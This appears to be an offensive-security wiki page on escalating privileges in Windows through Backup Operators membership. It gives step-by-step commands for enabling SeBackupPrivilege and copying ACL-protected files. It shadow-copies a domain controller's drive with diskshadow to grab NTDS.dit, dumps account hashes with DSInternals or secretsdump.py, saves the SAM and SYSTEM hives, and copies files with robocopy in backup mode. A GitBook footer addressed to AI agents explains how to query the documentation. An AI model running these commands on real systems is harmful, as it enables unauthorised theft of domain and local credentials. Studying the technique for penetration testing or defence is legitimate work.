> For the complete documentation index, see [llms.txt](https://breakme.gitbook.io/breakme-wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://breakme.gitbook.io/breakme-wiki/index/privilege-escalation/3-attack-group-privileges/backup-operators.md). # Backup Operators ## Backup Operators > Membership of this group grants its members the `SeBackup` and `SeRestore` ### SeBackup > `SeBackupPrivilege` iallows a user to bypass file and directory permission checks to perform backups. When granted, a user can read all files, regardless of the ACLs set on them, for backup purposes. {% hint style="info" %} We can't do this using the standard copy command. We need to programmatically copy the data, making sure to specify the [FILE\_FLAG\_BACKUP\_SEMANTICS](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) flag. The FILE\_FLAG\_BACKUP\_SEMANTICS specify that the file is being opened or created for a backup or restore operation. If a folder or file has an explicit deny entry for our current user or a group they belong to, this will prevent us from accessing it, even if the `FILE_FLAG_BACKUP_SEMANTICS` flag is specified. {% endhint %} ### POC We use this POC for the attack => Both .dll must be transfered to the target. ### Launching the attack First import the librairies from the POC ``` Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll ``` Then verifiy if `SeBackup` is enabled ``` whoami /priv #cmd Get-SeBackupPrivilege # powershell ``` If not we enable it ``` Set-SeBackupPrivilege ``` From there we have different attack options #### A) Copying a protected file ``` Copy-FileSeBackupPrivilege C:\secrets\creds.txt .\creds.txt ``` #### B) Attacking a DC - Copying NTDS.dit **This applies only in Active Directory context.** We can attempt to copy the DC database which contains all the users NTLM hashed passwords. We can't copy it with `Copy-FileSeBackupPrivilege` because the file is locked. {% hint style="info" %} We can use the Windows [diskshadow](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) utility to create a shadow copy of the `C` drive and expose it as `E` drive. The NTDS.dit in this shadow copy won't be in use by the system. {% endhint %} ``` PS C:\hacker> diskshadow.exe Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC, 10/14/2020 12:57:52 AM DISKSHADOW> set verbose on DISKSHADOW> set metadata C:\Windows\Temp\meta.cab DISKSHADOW> set context clientaccessible DISKSHADOW> set context persistent DISKSHADOW> begin backup DISKSHADOW> add volume C: alias cdrive DISKSHADOW> create DISKSHADOW> expose %cdrive% E: DISKSHADOW> end backup DISKSHADOW> exit PS C:\htb> dir E: Directory: E:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/6/2021 1:00 PM Confidential d----- 9/15/2018 12:19 AM PerfLogs d-r--- 3/24/2021 6:20 PM Program Files d----- 9/15/2018 2:06 AM Program Files (x86) d----- 5/6/2021 1:05 PM Tools d-r--- 5/6/2021 12:51 PM Users d----- 3/24/2021 6:38 PM Windows ``` Next, we can use the `Copy-FileSeBackupPrivilege` cmdlet to bypass the ACL and copy the NTDS.dit locally. ``` Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit ``` Now we can use a tool like`secretsdump.py` or the PowerShell `DSInternals` module to extract all Active Directory account credentials. Here we focus on the Administrator user: With DSInternals: ``` PS C:\hacker> Import-Module .\DSInternals.psd1 PS C:\hacker> $key = Get-BootKey -SystemHivePath .\SYSTEM PS C:\hacker> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key ``` With secretdumps.py: ``` secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL ``` #### C) Attacking Local Windows - **Backing up SAM and SYSTEM Registry Hives** We can back up the SAM and SYSTEM registry hives to extract local account credentials offline using a tool such as Impacket's `secretsdump.py` First we backup the hives ``` reg save HKLM\SYSTEM SYSTEM.SAV reg save HKLM\SAM SAM.SAV ``` #### D) Copying protected files with robocopy It's less common, but we can also leverage robocopy to copy files in backup mode: ``` robocopy /B C:\secrets .\hacker_folder creds.txt ``` * `/B`: Runs in "Backup mode." Allows Robocopy to bypass file and folder permission checks because of `SeBackupPrivilege` * `C:\secrets\creds.txt`: Source directory * `.\hacker_folder`: Destination directory * `creds.txt`: Specifies to only backup this file from the source directory --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://breakme.gitbook.io/breakme-wiki/index/privilege-escalation/3-attack-group-privileges/backup-operators.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.